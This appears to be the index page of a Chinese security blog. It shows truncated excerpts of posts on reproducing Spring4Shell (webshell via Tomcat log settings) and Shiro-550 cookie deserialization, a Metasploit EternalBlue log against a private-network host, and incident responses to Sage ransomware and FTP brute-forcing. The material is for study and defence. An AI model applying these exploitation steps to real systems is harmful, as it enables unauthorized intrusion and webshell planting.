TypechoJoeTheme

学习使用

统计
登录
用户名
密码
2022-03-31

Spring Rce CVE-2022-22965

Spring Rce CVE-2022-22965
漏洞介绍继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”。漏洞版本JDK 9及以上版本 使用Tomcat 服务器 以war 部署运行 使用了spring-webmvc或 spring-webflux Spring框架版本是 5.3.0 到 5.3.17, 5.2.0 到 5.2.19,以及更旧的版本。原理Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,攻击者通过构造恶意请求获取 AccessLogValve 对象并注恶意字段值触发 pipeline 机制可写任意路径下的文件。利用步骤覆盖 Tomcat 特定的ClassLoader属性,将访问日志文件路径更改为 web根目录下的某个位置,并将日志模式(写入的数据)更改为包含 webshel​​l 代码的常量模式。这会导致JSP_webshel​​l被放到web 根目录下。向写入的 webshel​​l 发送查询...
admin
2022-03-31

漏洞复现

1,336 阅读
0 评论
2022年03月31日
1,336 阅读
0 评论
2022-03-11

apache shiro-550

apache shiro-550
漏洞详情shiro反序列化原因是shiro的一个机制为了让浏览器或服务器重启后不丢失用户的登陆状态,会将用户信息保存到 rememberMe字段中 然后发送到服务端,服务端再对它进行base64解密,aes解密,再进行反序列化,由于在 1.2.4 这个版本里 shiro的key是固定的,所以可以通过构造一段恶意类经过aes加密再base64加密然后放到 rememberMe 伪造cookie信息,来让服务端加载,进而触发反序列化漏洞详细步骤:1.首先正常登录,然后生成带有rememberme的返回cookie值。2.生成cookie,shiro会提供rememberme功能,可以通过cookie记录登录用户,从而记录登录用户的身份认证信息,即下次无需登录即可访问。处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager3.之后进入serialize,对登录认证信息进行序列化4.然后加密,调用aes算法。5.加密结束,然后在在org/apache/shiro/web/mgt/CookieRememb...
admin
2022-03-11

漏洞复现

732 阅读
0 评论
2022年03月11日
732 阅读
0 评论
2022-02-28

MSF内网渗透实战

MSF内网渗透实战
渗透边界机msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.2.242 rhosts => 192.168.2.242 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.2.200:10000 [*] 192.168.2.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.2.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.2.242:445 - Scanned 1 of 1 hosts (100% complete) [+] 19...
admin
2022-02-28

内网渗透,渗透测试

878 阅读
0 评论
2022年02月28日
878 阅读
0 评论
2022-02-28

勒索病毒-应急响应

勒索病毒-应急响应
勒索病毒0x00 前言​ 勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。自WannaCry勒索病毒在全球爆发之后,各种变种及新型勒索病毒层出不穷。0x01 应急场景​ 某天早上,网站管理员打开OA系统,首页访问异常,显示乱码:0x02 事件分析​ 登录网站服务器进行排查,在站点目录下发现所有的脚本文件及附件都被加密为.sage结尾的文件,每个文件夹下都有一个!HELP_SOS.hta文件,打包了部分样本:打开!HELP_SOS.hta文件,显示如下: 到这里,基本可以确认是服务器中了勒索病毒,上传样本到360勒索病毒网站(http://lesuobingdu.360.cn)进行分析:确认web服务器中了sage勒索病毒,目前暂时无法解密。绝大多数勒索病毒,是无法解密的,一旦被加密,即使支付也不一定能够获得解密密钥。在平时运维中应积极做好备份工作,数据库与源码分离(类似OA系统附件...
admin
2022-02-28

Windows应急响应,安全服务

630 阅读
0 评论
2022年02月28日
630 阅读
0 评论
2022-02-28

FTP暴力破解-应急响应

FTP暴力破解-应急响应
FTP暴力破解0x00 前言​ FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。0x01 应急场景​ 从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。查看Window安全日志,发现大量的登录失败记录:0x02 日志分析安全日志分析: 安全日志记录着事件审计信息,包括用户验证(登录、远程访问等)和特定用户在认证后对系统做了什么。打开安全日志,在右边点击筛选当前日志, 在事件ID填入4625,查询到事件ID4625,事件数177007,从这个数据可以看出,服务器正则遭受暴力破解:进一步使用Log Parser对日志提取数据分析,发现攻击者使用了大量的用户名进行爆破,例如用户名:fxxx,共计进行了17826次口令尝试,攻击者基于...
admin
2022-02-28

Windows应急响应,安全服务

519 阅读
0 评论
2022年02月28日
519 阅读
0 评论